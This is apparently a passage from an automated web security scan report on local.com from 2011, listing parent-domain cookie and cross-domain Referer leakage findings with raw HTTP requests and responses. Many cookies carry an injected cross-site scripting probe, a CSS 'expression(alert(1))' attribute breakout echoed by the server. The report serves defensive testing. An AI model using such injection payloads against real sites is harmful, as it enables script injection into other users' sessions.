SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 46766
Date: Thu, 03 Feb 2011 16:50:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:14 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&topics.kw=food; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 46766

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Cooking, Nutrition and Food A
...[SNIP]...

7.39. http://www.local.com/ver1.0/Direct/JavascriptSDKProxy  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /ver1.0/Direct/JavascriptSDKProxy

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ver1.0/Direct/JavascriptSDKProxy HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/equity-bank-63975058/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.3.10.1296748820; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186476435569

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL01WSITELCL01proddmlocal
Cache-Control: public, max-age=86400
Expires: Fri, 04 Feb 2011 12:06:43 GMT
Last-Modified: Thu, 03 Feb 2011 12:06:43 GMT
ETag: -19638594
Vary: Host
Content-Type: text/javascript; charset=utf-8
Date: Thu, 03 Feb 2011 16:00:48 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SiteLifeHost=SJL01WSITELCL01proddmlocal; domain=local.com; path=/
Set-Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; path=/ ; domain=local.com; path=/
Set-Cookie: anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; domain=local.com; expires=Fri, 03-Feb-2012 16:00:49 GMT; path=/
Content-Length: 68758

...
var PluckSDK=(function(){var extend=function(obj,options){for(var v in options){obj[v]=options[v];}
return obj;};function instance(obj,constructor,objectType,options){if(!(obj instanceof construct
...[SNIP]...

7.40. http://www.local.com/ver1.0/Direct/Jsonp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /ver1.0/Direct/Jsonp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ver1.0/Direct/Jsonp?r=%7B%22Requests%22%3A%5B%7B%22UpdateArticleAction%22%3A%7B%22Categories%22%3A%5B%5D%2C%22OnPageTitle%22%3A%22Hillcrest%20Bank%20%2528Dallas%252C%20TX%2529%22%2C%22OnPageUrl%22%3A%22104826937%7CHillcrest%20Bank%7CDallas%252C%20TX%22%2C%22Section%22%3A%7B%22Section%22%3A%7B%22Name%22%3A%22Dallas%2C%20TX%22%7D%7D%2C%22UpdateArticle%22%3A%7B%22ArticleKey%22%3A%7B%22Key%22%3A%22104826937%22%7D%7D%7D%7D%5D%2C%22UniqueId%22%3A0%7D&cb=RequestBatch.callbacks.daapiCallback0&pcksl=http%3A%2F%2Fwww.local.com&pckdt=local.com HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.8.10.1296748820; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; ym_pop_freq1421534=1

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL01WSITELCL01proddmlocal
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/javascript; charset=utf-8
Date: Thu, 03 Feb 2011 16:01:40 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SiteLifeHost=SJL01WSITELCL01proddmlocal; domain=local.com; path=/
Set-Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; path=/ ; domain=local.com; path=/
Content-Length: 147

RequestBatch.callbacks.daapiCallback0({"ResponseBatch":{"Messages":[{"Message":"ok","MessageTime":"02/03/2011 08:01:41:469 AM"}],"Responses":[]}});

7.41. http://www.local.com/ver1.0/Photo/Upload  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /ver1.0/Photo/Upload

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ver1.0/Photo/Upload HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL01WSITELCL02proddmlocal
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 16:49:48 GMT
Content-Length: 102
Connection: close
Set-Cookie: SiteLifeHost=SJL01WSITELCL02proddmlocal; domain=local.com; path=/
Set-Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=663488778.20480.0000; path=/ ; domain=local.com; path=/

<script language="javascript">
document.domain = "local.com";
</script>
Error: No photo specified

7.42. http://www.local.com/ver1.0/ReviewPage.app  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /ver1.0/ReviewPage.app

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ver1.0/ReviewPage.app?onPage=1&reviewsPerPage=10&articleKey=104826937&pcksl=http%3A%2F%2Fwww.local.com&pckdt=local.com&rand=1296748922751 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.8.10.1296748820; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; ym_pop_freq1421534=1; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL01WSITELCL01proddmlocal
Vary: Content-Encoding
Cache-Control: private
Content-Type: application/json
Date: Thu, 03 Feb 2011 16:01:41 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SiteLifeHost=SJL01WSITELCL01proddmlocal; domain=local.com; path=/
Set-Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; path=/ ; domain=local.com; path=/
Content-Length: 616

{
"ReviewsPage": {
"SortType": {
"SortOrder": "Descending",
"ObjectType": "Models.System.Sorting.TimestampSort"
},
"AverageReviewRating": 0.0,
"TotalItems": 0,

...[SNIP]...

7.43. http://www.local.com/ver1.0/Video/Upload  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /ver1.0/Video/Upload

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ver1.0/Video/Upload HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
x-SiteLife-host: SJL01WSITELCL02proddmlocal
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Date: Thu, 03 Feb 2011 16:49:49 GMT
Content-Length: 102
Connection: close
Set-Cookie: SiteLifeHost=SJL01WSITELCL02proddmlocal; domain=local.com; path=/
Set-Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=663488778.20480.0000; path=/ ; domain=local.com; path=/

<script language="javascript">
document.domain = "local.com";
</script>
Error: No video specified

8. Cross-domain Referer leakage  previous  next
There are 66 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


8.1. http://www.local.com/business/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /business/?location=Dallas%2c+TX HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 77815
Date: Thu, 03 Feb 2011 16:39:53 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:39:53 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Business+Home|home|%2fbusiness%2f%3flocation%3dDallas%252c%2bTX~Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 77815

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX - Search for local
...[SNIP]...
</div>
                <a omn_key="BL:100:1:1011" onclick="return loc_click(this);" href="http://weather.weatherbug.com/?zip=75201&zcode=6292" target="_blank">
                <img src="/skins/default/images/wBugLogo.jpg" alt="WeatherBug" class="mT5" />
...[SNIP]...
</a>
           <script src="http://cf.kampyle.com/k_button.js" type="text/javascript"></script>
...[SNIP]...
<div class="facebook">
                   <a href="http://www.facebook.com/local.com/" target="_blank" alt="Recommend Local.com on Facebook" title="Recommend Local.com on Facebook" class="fBookButton" omn_key="BL:101:1:1014" onclick="return loc_click(this);">
                   </a>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="ic-hulk2010production.122.2O7.net/b/ss/ic-hulk2010production/1/H.17--NS/0?pageName=Businesses+-+Landing" height="1" width="1" border="0" alt="" />
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=&c3=&c4=&c5=&c6=&c15=&cj=1" />
</noscript>

<script type="text/javascript" src="http://loadus.exelator.com/load/?p=235&g=001&ctg=&cat=&state=TX&city=Dallas&kw=banks"></script>
...[SNIP]...

8.2. http://www.local.com/business/results/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/results/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /business/results/?keyword=restaurants&location=dallas%2c+tx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 167707
Date: Thu, 03 Feb 2011 16:43:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:43:23 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=restaurants&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=restaurants|Dallas%2c+TX~banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 167707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX restaurants | Find
...[SNIP]...
</div>
                <a omn_key="BS1SEO:100:1:1011" onclick="return loc_click(this);" href="http://weather.weatherbug.com/?zip=75201&zcode=6292" target="_blank">
                <img src="/skins/default/images/wBugLogo.jpg" alt="WeatherBug" class="mT5" />
...[SNIP]...
YGK[4AvTl4hA5E.k3cJ1QN0uALSF.k2HM7kFALSF7iA7uE7iE2CMGA7B.k1FGNJ1yH7yS4QHELLJ1sL7JF7AGKVbA4c*[w4pb4kzqq4mbeS4ks^^!AHQ3FA3E^splrl{2A|5cF.k[2Answ4e.k3PA3EA3Z]6jo4oM1rK1MB2My1LE4R" target="_blank">
                   <img src="http://cr0.worthathousandwords.com/9/84/EB/4E397718ABD1025D882FA27CA34.jpg?pid=5650.510&qs=yvFvltygx%7Beuux%2CdmzDx%7C%7D1%5DllBlgynE%C2%81vq4fxq-uyr%40Jkhwj%26D%C2%83ys%21Rk%7Brgho%25Lrxh-ejy%40Omuf%25Jlwmuh%25Sh%C2%81mjbs%26Unw%7Bbzxdwx5%21Ikorgppzy%23Osve3%26Grrl%21%7Cowq%24%5Ct%25Zrme%C2%80%2F" alt="" />
               </a>
...[SNIP]...
4vGVe3F{1lWl[opy.jbG5uI1yKGM.ks^x3WV_-8kHTn2aw2cw0qA4fwm!4XA4lW6eo4GF4L.kMEMH1NG4MJ1QE0jE4QKHFFE4TJ7xKmto:5Cp3ZS5Fa5x-8XGKm2FY6VT6TN6SL6ZK4cx3KtryYo3ZL6XI6TA4fn9w^[*pB2My1LGKL" target="_blank">
                   <img src="http://cr0.worthathousandwords.com/F/72/77/24491BD8C89B2ADFEC94FA01466.jpg?pid=5650.510&qs=yvFvltygx%7Beuux%2CdmzDx%7C%7D1XppwjMd%7Bhlo3irv*%7BuqCRum%7Df%25Md%7Bhlo%2Bjh%7CA%5Eijt%23%C2%82s%7C%28wk%23qiyf1%26%7Cxy.sj%26Ijqpm%7E" alt="" />
               </a>
...[SNIP]...
[w4ob4jzqq4lbeS4js^^!AHQ3EA3Rw3Gv.klvp2Qz3Nn2aA3D|1Kn3Snv.k2hs,A3Y{3KA6y.k5MGKp6DT3qL0PI3v.jMIMF2xL0JG4lo8zF4YGK!*m4nE7pGKnvA4bNRR0FJLT2YMSS2wJJRSU7oKKIKSKNUM8xK4YH6EB2Ky1LF3v" target="_blank">
                   <img src="http://cr0.worthathousandwords.com/5/85/F4/18608ABE2247E240982D252C5DF.jpg?pid=5650.510&qs=yvFvltygx%7Beuux%2CdmzDmq4%7Drtsphgo7gvn475%3A8%3E1%3A8%3B%3E4-uyr%40Si%7Bt%25Vl%C2%83%7Eh%27ikvFPhslk%23%3A%24%7Bpu%26Sr%7E%C2%81b%25*%3C7%3D%40" alt="" />
               </a>
...[SNIP]...
A7F.kHELL6DG7JL7y.kEA2zVbA4l*[w5jb3Yzqq4AbeS3Ys3z!3VQ3CA3N}1V.k*]ot0bn^z[=1ZzxA3N]6WGVI0FE0TN7sGVtyo2N.ks^8mHVlqt6HHTF3uN4A*^x.u]3T[2uA4l]*!p[3Jr2PA2z*8E.uxp8h*8xTn!nB2Ky1LFHG" target="_blank">
